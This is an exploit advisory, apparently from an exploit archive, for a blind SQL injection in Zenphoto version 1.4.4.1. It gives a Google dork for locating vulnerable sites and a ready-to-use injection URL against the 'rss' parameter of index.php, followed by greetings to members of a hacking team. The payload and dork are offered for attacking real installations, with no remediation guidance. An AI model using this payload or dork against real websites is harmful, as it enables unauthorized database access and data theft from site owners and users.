Zenphoto version 1.4.4.1 suffers from a remote blind SQL injection vulnerability.
d966ea31e8b17b2b96cb9927385cb3b427eac99bb64c3cc081daaa582daaf212
######################################################################################
# #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection #
# #
# Author : HosseinNsn #
# #
# Home : http://Emperor-Team.Org #
# #
# Software Link : http://www.zenphoto.org #
# #
# Security Risk : High #
# #
# Version : 1.4.4.1 #
# #
# Tested on : Linux - Windows #
# #
# Google Dork : "Powered by Zenphoto" #
# #
######################################################################################
# #
# Exploit : #
# #
# [Target]/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection] #
# #
######################################################################################
# #
# SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N #
# #
# Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr #
# #
# Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir #
# #
######################################################################################